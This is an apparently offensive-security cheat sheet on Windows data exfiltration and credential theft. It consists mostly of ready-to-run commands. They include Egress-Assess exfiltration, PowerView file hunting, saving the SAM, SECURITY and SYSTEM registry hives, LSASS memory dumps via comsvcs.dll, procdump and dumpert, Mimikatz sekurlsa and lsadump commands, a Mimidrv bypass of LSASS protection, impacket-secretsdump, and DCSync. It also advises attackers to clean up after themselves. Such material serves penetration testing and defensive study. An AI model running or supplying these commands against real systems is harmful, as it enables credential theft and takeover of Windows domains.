Data Mining and Exfiltration

Exfiltration

HTTP(S) - DNS - FTP

./Egress-Assess.py --server http[s] --username <username> --password <password>
Invoke-EgressAssess -client http[s] -IP <server-IP/domain> --username <username> -Password <password> -Datatype ssn

Find interesting files

PowerView

Find-InterestingFile -Path \\server\share [-Include keyword1,keyword2] [-OfficeDocs] [-LastAccessTime (Get-Date).AddDays(-7)]

NetNTLMv1 hash of the current user

https://github.com/eladshamir/Internal-Monologue

Credentials

Without admin rights

Take a look at the techniques used for password mining in a privilege escalation scenario.

With admin rights

Windows Credential Management

tip

Non-network logon (Interactive/NetworkCleartext/...): the client sends credentials to the service (creds are in lsass.exe).

SAM

C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY

reg.exe save hklm\sam c:\temp\sam.save
reg.exe save hklm\security c:\temp\security.save
reg.exe save hklm\system c:\temp\system.save

lsadump::sam

load kiwi
lsa_dump_sam
use post/windows/gather/smart_hashdump

scanner/smb/impacket/secretsdump
impacket-secretsdump <admin>@<ip> -hashes <lm:nt>

Cache

lsadump::cache /system:system /sam:sam /security:security

run post/windows/gather/cachedump

LSASS

LSASS is protected - Mimidrv

https://posts.specterops.io/mimidrv-in-depth-4d273d19e148

tip

If LSASS is protected (Full WinTcb), try to add or remove process protection using Mimidrv. It requires SeLoadDriverPrivilege.

It starts a service using advapi32!ServiceCreate granting access to the service to Everyone group.

Do not forget to clean after yourself -!.

danger

Service Start Type: auto start (2)

Event ID 4697 contains information about the account that loaded the driver. Audit Security System Extension must be configured via Group Policy for this event to be generated.

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL 
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL" 

PPLdump64.exe -v lsass lass.dmp

!+
!processProtect /process:mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

Cleaning steps

!processprotect /process:lsass.exe
!-

LSASS is not protected

rundll32.exe comsvcs.dll, #24 "<PID> my.dmp full"

sqldumper.exe <PID> 0 0x0110

info

By default: C:\Windows\temp\dumpert.dmp.

dumpert.exe
rundll32.exe dumpert.dll,Dump

procdump.exe -accepteula -ma lsass.exe dump.dmp

sekurlsa::minidump dump.dmp (offline)
sekurlsa::logonPasswords full (offline)
-----
sekurlsa::logonPasswords full
-----
lsadump::lsa /inject
lsadump::lsa /patch (/id:<account_id>)
lsadump::lsa /patch (/name:<account_name>)

use post/windows/gather/smart_hashdump
-----
load kiwi
creds_all

wce32.exe [-w]
fgdump [-u <user> -p <password> -h <ip>]

DCSync

lsadump::dcsync /user:<domain\user> /domain:<fqdn_domain> [/dc:<dc_name>]

Exfiltration​

Find interesting files​

NetNTLMv1 hash of the current user​

Credentials​

Without admin rights​

With admin rights​

Windows Credential Management​

SAM​

Cache​

LSASS​

DCSync​